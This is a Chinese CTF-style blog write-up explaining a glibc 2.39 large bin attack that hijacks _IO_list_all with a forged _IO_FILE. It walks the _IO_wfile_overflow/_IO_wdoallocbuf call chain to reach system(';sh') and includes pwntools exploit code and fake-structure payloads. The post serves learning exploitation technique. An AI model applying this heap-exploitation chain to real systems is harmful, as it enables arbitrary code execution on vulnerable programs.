<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>堆上的IO，largbin高版本的利用 | Hexo</title><meta name="author" content="abababcd"><meta name="copyright" content="abababcd"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="堆上的IO，largbin高版本的利用​浅析Large_bins_attack在高低版本的利用large bin attack - DAMOXILAI - 博客园   ● exit()的IO调用链  └─ __run_exit_handlers      └─ 遍历 atexit 回调链表          └─ _IO_cleanup()                       [libc初">
<meta property="og:type" content="article">
<meta property="og:title" content="堆上的IO，largbin高版本的利用">
<meta property="og:url" content="http://example.com/2026/05/24/index/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="堆上的IO，largbin高版本的利用​浅析Large_bins_attack在高低版本的利用large bin attack - DAMOXILAI - 博客园   ● exit()的IO调用链  └─ __run_exit_handlers      └─ 遍历 atexit 回调链表          └─ _IO_cleanup()                       [libc初">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/img/-16831111401075256822.suf.jpg">
<meta property="article:published_time" content="2026-05-24T03:53:11.000Z">
<meta property="article:modified_time" content="2026-07-21T15:56:47.868Z">
<meta property="article:author" content="abababcd">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/-16831111401075256822.suf.jpg"><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "堆上的IO，largbin高版本的利用",
  "url": "http://example.com/2026/05/24/index/",
  "image": "http://example.com/img/-16831111401075256822.suf.jpg",
  "datePublished": "2026-05-24T03:53:11.000Z",
  "dateModified": "2026-07-21T15:56:47.868Z",
  "author": [
    {
      "@type": "Person",
      "name": "abababcd",
      "url": "http://example.com"
    }
  ]
}</script><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2026/05/24/index/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css?v=5.6.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@7.3.1/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        const data = { value }

        if (ttl != null) {
          data.expiry = Date.now() + ttl * 86400000
        }

        localStorage.setItem(key, JSON.stringify(data))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return

        try {
          const data = JSON.parse(itemStr)

          if (data.expiry && Date.now() > data.expiry) {
            localStorage.removeItem(key)
            return
          }

          return data.value
        } catch {
          localStorage.removeItem(key)
        }
      }
    }

    const scriptCache = new Map()
    const cssCache = new Map()
    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => {
        if (scriptCache.has(url)) {
          return scriptCache.get(url)
        }

        const promise = new Promise((resolve, reject) => {
          const script = document.createElement('script')

          script.src = url
          script.async = true

          for (const key in attr) {
            script.setAttribute(key, attr[key])
          }

          script.onload = resolve
          script.onerror = reject

          document.head.appendChild(script)
        })

        scriptCache.set(url, promise)

        return promise
      },
      getCSS: (url, id) => {
        if (cssCache.has(url)) {
          return cssCache.get(url)
        }

        const promise = new Promise((resolve, reject) => {
          const link = document.createElement('link')

          link.rel = 'stylesheet'
          link.href = url

          if (id) {
            link.id = id
          }

          link.onload = resolve
          link.onerror = reject

          document.head.appendChild(link)
        })

        cssCache.set(url, promise)

        return promise
      },
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const metaThemeColor = document.querySelector('meta[name="theme-color"]')
      const activateDarkMode = () => {
        document.documentElement.dataset.theme = 'dark'
        if (metaThemeColor !== null) {
          metaThemeColor.setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.dataset.theme = 'light'
        if (metaThemeColor !== null) {
          metaThemeColor.setAttribute('content', '#ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: {"path":"/search.xml","preload":false,"top_n_per_article":1,"unescape":false,"pagination":{"enable":false,"hitsPerPage":8},"languages":{"hits_empty":"未找到符合您查询的内容：${query}","hits_stats":"共找到 ${hits} 篇文章"}},
  translate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: '复制成功',
    error: '复制失败',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid@4.13.0/dist/infinitegrid.min.js',
    buttonText: '加载更多'
  },
  isPhotoFigcaption: false,
  islazyloadPlugin: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: '堆上的IO，largbin高版本的利用',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">Hexo</span></a><a class="nav-page-title" href="/"><span class="site-name">堆上的IO，largbin高版本的利用</span><span class="site-name"><i class="fa-solid fa-circle-arrow-left"></i><span>  返回首页</span></span></a></span><div id="menus"><div id="search-button"><span class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></span></div></div></nav><div id="post-info"><h1 class="post-title">堆上的IO，largbin高版本的利用</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2026-05-24T03:53:11.000Z" title="发表于 2026-05-24 11:53:11">2026-05-24</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2026-07-21T15:56:47.868Z" title="更新于 2026-07-21 23:56:47">2026-07-21</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">浏览量:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><h1 id="堆上的IO，largbin高版本的利用"><a href="#堆上的IO，largbin高版本的利用" class="headerlink" title="堆上的IO，largbin高版本的利用"></a>堆上的IO，largbin高版本的利用</h1><p><img src="/%5Cassets%5Cimage-20260524195338-loa2jsp.png" alt="image">​<br><a href="read://https_xz.aliyun.com/?url=https%3A%2F%2Fxz.aliyun.com%2Fnews%2F15081">浅析Large_bins_attack在高低版本的利用</a><br><a target="_blank" rel="noopener" href="https://www.cnblogs.com/damoxilai/p/16380750.html">large bin attack - DAMOXILAI - 博客园</a>  </p>
<p>● exit()的IO调用链<br>  └─ __run_exit_handlers<br>      └─ 遍历 atexit 回调链表<br>          └─ _IO_cleanup()                       [libc初始化时注册的ef_cxa回调]<br>              └─ _IO_flush_all_lockp(1)</p>
<pre><code>              for (fp = _IO_list_all; fp != NULL; fp = fp-&gt;_chain)  
              │  
              ├─ 条件1: _IO_flockfile(fp)  
              │         → fp-&gt;_lock == NULL ? 跳锁 : 加锁  
              │  
              ├─ 条件2(分支A): _mode &lt;= 0 &amp;&amp; _IO_write_ptr &gt; _IO_write_base  
              │   条件2(分支B): _mode &gt; 0  &amp;&amp; _wide_data-&gt;_IO_write_ptr  
              │                                        &gt; _wide_data-&gt;_IO_write_base  
              │   任一成立 → 进入 _IO_OVERFLOW  
              │  
              └─ _IO_OVERFLOW(fp, EOF)  
                  │  展开为: (fp-&gt;vtable-&gt;__overflow)(fp, EOF)  
                  │  
                  └─ _IO_wfile_overflow(fp, EOF)     [vtable = _IO_wfile_jumps]  
                      │  
                      ├─ 检查1: _flags &amp; _IO_NO_WRITES (0x8) → 有则return  
                      │  
                      ├─ 检查2: _flags &amp; _IO_CURRENTLY_PUTTING (0x800)  
                      │         → 没设置则进入if  
                      │  
                      └─ 检查3: _wide_data-&gt;_IO_write_base == 0  
                          │  → 是 → _IO_wdoallocbuf(fp)  
                          │  
                          └─ _IO_wdoallocbuf(fp)  
                              │  
                              ├─ 检查: _wide_data-&gt;_IO_buf_base → 有则return  
                              │  
                              └─ (fp-&gt;_wide_data-&gt;_wide_vtable-&gt;__doallocate)(fp)  
                                  │  展开: system(fp)  
                                  │  
                                  └─ system(&quot;;sh&quot;) → /bin/sh  
</code></pre>
<p>ida:<img src="/%5Cassets%5Cimage-20260529213735-i0bjl95.png" alt="image"><br>简单阐述一下功能  create：创建函数，但是堆申请大小要至少大于0x408<br>                delete：删除函数，但是存在uaf<br>                show：输出堆块数据区<br>                edit：根据申请堆块大小来写数据区内容<br>                exit：正常free掉后执行exit（0）退出（漏洞所在）<br>大致思路：<br>    泄露libc基址，直接利用unsortedbin来泄露即可，delete对应堆块然后删掉show即可，再减掉偏移即可<br>    然后进入正式的利用：利用large_bin来构造伪造_IO_file_结构<br>    对应资料参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/news/15081">浅析Large_bins_attack在高低版本的利用-先知社区</a><br>    这里的libc版本是2.39<br>    assert (chunk_main_arena (bck-&gt;bk));&#x2F;&#x2F;断言bck-&gt;bk属于main_arena<br>if ((unsigned long) (size) &lt; (unsigned long) chunksize_nomask (bck-&gt;bk))<br>{<br>       fwd &#x3D; bck; &#x2F;&#x2F;这里的fwd可以粗略的认为是large_bin归属的main_arena<br>       bck &#x3D; bck-&gt;bk; &#x2F;&#x2F;bck成了main_arena的bk指针指向的堆块<br>       victim-&gt;fd_nextsize &#x3D; fwd-&gt;fd; &#x2F;&#x2F;我们申请的小堆块的fd_nextsize指向了main_arena的fd指针，也就是所在的large_bin的最大的堆块<br>       victim-&gt;bk_nextsize &#x3D; fwd-&gt;fd-&gt;bk_nextsize;&#x2F;&#x2F;攻击点，没有检测，所以我们可以伪造大堆块的bk_nextsize<br>       fwd-&gt;fd-&gt;bk_nextsize &#x3D; victim-&gt;bk_nextsize-&gt;fd_nextsize &#x3D; victim; &#x2F;&#x2F;先进行右值运算，如果在没有进行修改的情况下，等式可以化简为fwd-&gt;fd-&gt;bk_nextsize &#x3D; victim，也就是最大堆块的bk_nextsize指向我们的最小堆块victim<br>}<br>也就是，这里如果整理进去的large_bin比large_bin里面最小的还要小，那么就会执行这个，也就是victim，新整理进去的，会调整它的fd_nextsize和bk_nextsize，之后就是最后一步，也就是最重要的会根据已经改的victim_的bk_nextsize的把对应堆块的fd_nextsize改成victim,这里就是主要漏洞点，那么这里控制到了victim堆块的fd_nextsize，也就相当于可以控制指针了，也就是其bk_nextsize所指向的内容的0x10处的指针指向了victim堆块，之后呢伪造victim堆块的结构体即可</p>
<p>第一步先改堆块：<br>    add(2,0x508)<br>    add(0,0x520)<br>    add(5,0x508)<br>    add(1,0x500)<br>    delete(0)<br>    show(0)<br>    p.recvuntil(b’content : ‘)<br>    addr&#x3D;u64(p.recv(6).ljust(8,b’\x00’))<br>    print(hex(addr))<br>    #gdb.attach(p)<br>    base&#x3D;addr-0x203b20<br>    IO_list&#x3D;base+libc.sym[‘_IO_list_all’]<br>    print(hex(base))<br>    system&#x3D;base+libc.sym[‘system’]<br>    IO_wfile_jumps&#x3D;base+libc.sym[‘_IO_wfile_jumps’]<br>    head&#x3D;addr+0x430<br>    #gdb.attach(p)<br>    payload&#x3D;b’a’<em>0x10<br>add(3,0x530)<br>edit(0,payload)<br>show(0)<br>p.recvuntil(b’content : aaaaaaaaaaaaaaaa’)<br>heap&#x3D;u64(p.recv(6).ljust(8,b’\x00’))<br>print(hex(heap))<br>#gdb.attach(p)<br>payload&#x3D;p64(head)</em>* 2+p64(heap)+p64(IO_list-0x20)<br>edit(0,payload)<br>delete(1)<br>add(4,0x540)<br>#gdb.attach(p)<br>edit(5, b’a’ * 0x500 + p32(0xfffff7f5) + b’;sh\x00’)<br>chunk&#x3D;heap+0xa40<br>#gdb.attach(p)<br>    这里很明显是选用的堆块0和堆块1来使能够构造出能够伪造IO_file的结构体堆块，这里的结构体堆块明显就是1了，由于1的bk_nextsize会被改成0的bk_nextsize,<br>所以这里直接先利用uaf来伪造好其内容即可，之后再次之前还需要去拿到堆块的地址，才行，不然后面没法去还原堆块的head，其实也就是main_arena，尝试了下，可以<br>其实也可以换上对应libc来计算偏移，因为largbin在只有一个堆块的时候，它的bk_nextsize和fd_nextsize是指向自己的头，所以这里泄露出来的heap其实就是堆块0的头地址，这里加上加上0xa40正好是堆块1的头地址，并且heap本身也就是堆块0来伪造时还原原部分的东西<br>    这里堆块1的头地址，也是也是方便后面伪造的时候调转的地址<br>伪造的_IO_file结构：<br>edit(5, b’a’ * 0x500 + p32(0xfffff7f5) + b’;sh\x00’)<br>chunk&#x3D;heap+0xa40<br>#gdb.attach(p)&#x2F;&#x2F;注意size段也占了一个<br>fake_IO &#x3D; p64(0) * 2 + p64(1) + p64(2)<br>fake_IO &#x3D; fake_IO.ljust(0xa0 - 0x10,b’\x00’) + p64(chunk + 0x100) #wide_data<br>fake_IO &#x3D; fake_IO.ljust(0xc0 - 0x10,b’\x00’) + p64(0xffffffffffffffff) #mode<br>fake_IO &#x3D; fake_IO.ljust(0xd8 - 0x10,b’\x00’) + p64(IO_wfile_jumps) #vtable<br>fake_IO &#x3D; fake_IO.ljust(0x100 - 0x10 + 0xe0,b’\x00’) + p64(chunk + 0x200) #_wide_data-&gt;_wide_vtable<br>fake_IO &#x3D; fake_IO.ljust(0x200 - 0x10,b’\x00’) + p64(0) * 13 + p64(system) # _wide_data-&gt;_wide_vtable-&gt;doallocate<br>edit(1,fake_IO)</p>
<p>梳理劫持流程：<br>    0x00        _flags                chunk header[0x00] &#x3D; prev_size<br>    0x08        _IO_read_ptr          chunk header[0x08] &#x3D; size<br>    0x10        _IO_read_end          fake_IO[0x00] &#x3D; p64(0)<br>    0x18        _IO_read_base         fake_IO[0x08] &#x3D; p64(0)<br>    0x20        _IO_write_base        fake_IO[0x10] &#x3D; p64(1)  ←!<br>    0x28        _IO_write_ptr         fake_IO[0x18] &#x3D; p64(2)  ←!<br>    0x30        _IO_write_end         fake_IO[0x20] &#x3D; 0 (ljust填充)<br>    0x38        _IO_buf_base          0 (ljust)<br>    0x40        _IO_buf_end           0<br>    …<br>    0x68        _chain                0 (ljust)<br>    …<br>    0x88        _lock                 0 (ljust)<br>    …<br>    0xa0        _wide_data            fake_IO[0x90] &#x3D; chunk+0x100<br>    …<br>    0xc0        _mode                 fake_IO[0xb0] &#x3D; 0xFFFFFFFFFFFFFFFF<br>    0xc4~0xd7   padding              0<br>    0xd8        vtable                fake_IO[0xc8] &#x3D; _IO_wfile_jumps<br>先展示调用链就是最开头的那个，第一个过条件时_IO_flush_all_lockp(),这里注意下伪造的_IO_file_结构里面的锁处要为0，否则无法进行，<br>然后就i是进入IO_overflow的条件_mode &lt;&#x3D; 0 &amp;&amp; _IO_write_ptr &gt; _IO_write_base，还有另外一个分支，这里用的时这个<br>可以看到这里的write_ptr确实时大于base的mode的伪造也是小于0的负数，所以这里就绕过进入了_IO_overflow<br>    进入IO_overflow以后就是：  </p>
<p>_IO_wfile_overflow(FILE *f, wint_t wch)<br>{<br>    &#x2F;&#x2F; —- 检查1: _IO_NO_WRITES 标志 —-<br>    if (f-&gt;_flags &amp; _IO_NO_WRITES)  &#x2F;&#x2F; _IO_NO_WRITES &#x3D; 0x0008<br>    {<br>        f-&gt;_flags |&#x3D; _IO_ERR_SEEN;<br>        __set_errno(EBADF);<br>        return WEOF;                &#x2F;&#x2F; ← 如果flags有0x8就死在这<br>    }<br>    &#x2F;&#x2F; 我们的 flags &#x3D; 0, 不触发 ?</p>
<pre><code>// ---- 检查2: 当前不在&quot;正在写&quot;状态 ----  
if ((f-&gt;_flags &amp; _IO_CURRENTLY_PUTTING) == 0)  // 0x0800  
&#123;  
    // 宽字符写缓冲区还没分配?  
    if (f-&gt;_wide_data-&gt;_IO_write_base == 0)     // ← 需要为0!  
    &#123;  
        // ---- 分配宽字符缓冲区 ----  
        _IO_wdoallocbuf(f);                     // ← 攻击触发点!  
        // ...  
    &#125;  
&#125;  
// 我们的 setup:  
//   _flags = 0                          → 不触发 _IO_NO_WRITES  
//   _flags &amp; 0x800 = 0                  → 走if分支  
//   _wide_data → chunk+0x100            → _IO_write_base = 0 ?  
</code></pre>
<p>}<br>这里的话只要flag的头里面没有0x8即可过检查，这里需要注意wide_data所指向的_IO_write_base和我们伪造的write_base不一定时一样的，因为这个是时根据wide_data的指针内容和对应的偏移来跳转的<br>wide_data的具体结构：<br>struct _IO_wide_data           &#x2F;&#x2F; 宽字符数据结构体<br>{<br>    wchar_t *_IO_read_ptr;     &#x2F;&#x2F; 0x00<br>    wchar_t *_IO_read_end;     &#x2F;&#x2F; 0x08<br>    wchar_t *_IO_read_base;    &#x2F;&#x2F; 0x10<br>    wchar_t *_IO_write_base;   &#x2F;&#x2F; 0x18: ← _IO_wfile_overflow检查这里是否为0<br>    wchar_t *_IO_write_ptr;    &#x2F;&#x2F; 0x20<br>    wchar_t *_IO_write_end;    &#x2F;&#x2F; 0x28<br>    wchar_t *_IO_buf_base;     &#x2F;&#x2F; 0x30<br>    wchar_t *_IO_buf_end;      &#x2F;&#x2F; 0x38<br>    wchar_t *_IO_save_base;    &#x2F;&#x2F; 0x40<br>    wchar_t *_IO_backup_base;  &#x2F;&#x2F; 0x48<br>    wchar_t *_IO_save_end;     &#x2F;&#x2F; 0x50<br>    __mbstate_t _IO_state;     &#x2F;&#x2F; 0x58<br>    __mbstate_t _IO_last_state;&#x2F;&#x2F; 0x60<br>    struct _IO_codecvt _codecvt;&#x2F;&#x2F; 0x68<br>    wchar_t _shortbuf[1];      &#x2F;&#x2F; 0xc8<br>    &#x2F;&#x2F; …<br>    const struct _IO_jump_t *_wide_vtable; &#x2F;&#x2F; 0xe0: ← 假跳板目标!<br>    &#x2F;&#x2F;                                        __doallocate替换为system<br>};<br>这里的话也就是wide指针的0x18的地方为0即可，之后就进入到了 _IO_wdoallocbuf(f)<br>    进去之后呢，就是调用了fp-&gt;_wide_data-&gt;_wide_vtable-&gt;__doallocate<br>    这里可以看到wide_vtable对于wide_data的 偏移是0xe0，doallcate在vtable偏移0x68处，这个位置放上system即可<br>_wide_vtable:<br>const struct _IO_jump_t _IO_wfile_jumps <strong>attribute</strong>((section(“__libc_IO_vtables”))) &#x3D;<br>{<br>    0,                       &#x2F;&#x2F; 0x00 __dummy<br>    0,                       &#x2F;&#x2F; 0x08 __dummy2<br>    _IO_file_finish,         &#x2F;&#x2F; 0x10 __finish<br>    _IO_wfile_overflow,      &#x2F;&#x2F; 0x18 __overflow    ← _IO_OVERFLOW调这里<br>    _IO_wfile_underflow,     &#x2F;&#x2F; 0x20 __underflow<br>    _IO_wfile_underflow,     &#x2F;&#x2F; 0x28 __uflow<br>    _IO_wdefault_pbackfail,  &#x2F;&#x2F; 0x30 __pbackfail<br>    _IO_wdefault_xsputn,     &#x2F;&#x2F; 0x38 __xsputn<br>    _IO_wdefault_xsgetn,     &#x2F;&#x2F; 0x40 __xsgetn<br>    _IO_wfile_seekoff,       &#x2F;&#x2F; 0x48 __seekoff<br>    _IO_default_seekpos,     &#x2F;&#x2F; 0x50 __seekpos<br>    _IO_default_setbuf,      &#x2F;&#x2F; 0x58 __setbuf<br>    _IO_wfile_sync,          &#x2F;&#x2F; 0x60 __sync<br>    _IO_wfile_doallocate,    &#x2F;&#x2F; 0x68 __doallocate  ← 正常路径<br>    _IO_file_read,           &#x2F;&#x2F; 0x70 __read<br>    _IO_file_write,          &#x2F;&#x2F; 0x78 __write<br>    _IO_file_seek,           &#x2F;&#x2F; 0x80 __seek<br>    _IO_file_close,          &#x2F;&#x2F; 0x88 __close<br>    _IO_file_stat,           &#x2F;&#x2F; 0x90 __stat<br>    _IO_wfile_showmanyc,     &#x2F;&#x2F; 0x98 __showmanyc<br>    _IO_wfile_imbue,         &#x2F;&#x2F; 0xa0 __imbue<br>};<br>这里可以看到doallcate在wide_vtable里面的偏移是0x68，就是执行对应位置的system了，system（sh）</p>
<p>‍</p>
</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="http://example.com">abababcd</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="http://example.com/2026/05/24/index/">http://example.com/2026/05/24/index/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来源 <a href="http://example.com" target="_blank">Hexo</a>！</span></div></div><div class="tag_share"><div class="post-share"><div class="social-share" data-image="/img/-16831111401075256822.suf.jpg" data-sites="facebook,x,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.6/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.6/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related full-width" href="/2026/07/21/hello-world/" title="Hello World"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info"><div class="info-1"><div class="info-item-1">上一篇</div><div class="info-item-2">Hello World</div></div><div class="info-2"><div class="info-item-1">Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick StartCreate a new post1$ hexo new &quot;My New Post&quot;  More info: Writing Run server1$ hexo server  More info: Server Generate static files1$ hexo generate  More info: Generating Deploy to remote sites1$ hexo deploy  More info: Deployment </div></div></div></a></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/-16831111401075256822.suf.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">abababcd</div><div class="author-info-description"></div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">2</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%A0%86%E4%B8%8A%E7%9A%84IO%EF%BC%8Clargbin%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-number">1.</span> <span class="toc-text">堆上的IO，largbin高版本的利用</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/07/21/hello-world/" title="Hello World">Hello World</a><time datetime="2026-07-21T12:57:54.452Z" title="发表于 2026-07-21 20:57:54">2026-07-21</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/05/24/index/" title="堆上的IO，largbin高版本的利用">堆上的IO，largbin高版本的利用</a><time datetime="2026-05-24T03:53:11.000Z" title="发表于 2026-05-24 11:53:11">2026-05-24</time></div></div></div></div></div></div></main><footer id="footer"><div class="footer-other"><div class="footer-copyright"><span class="copyright">&copy;&nbsp;2025 - 2026 By abababcd</span><span class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo 7.3.0</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly 5.6.1</a></span></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="日间和夜间模式切换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js?v=5.6.1"></script><script src="/js/main.js?v=5.6.1"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><i class="fas fa-spinner fa-pulse" id="loading-status" hidden="hidden"></i><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="text-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据加载中</span></div><div class="local-search-input"><input placeholder="搜索文章" type="text"/></div><hr/><div id="local-search-results"></div><div class="ais-Pagination" id="local-search-pagination" style="display:none;"><ul class="ais-Pagination-list"></ul></div><div id="local-search-stats"></div></div><div id="search-mask"></div><script src="/js/search/local-search.js?v=5.6.1"></script></div></div></body></html>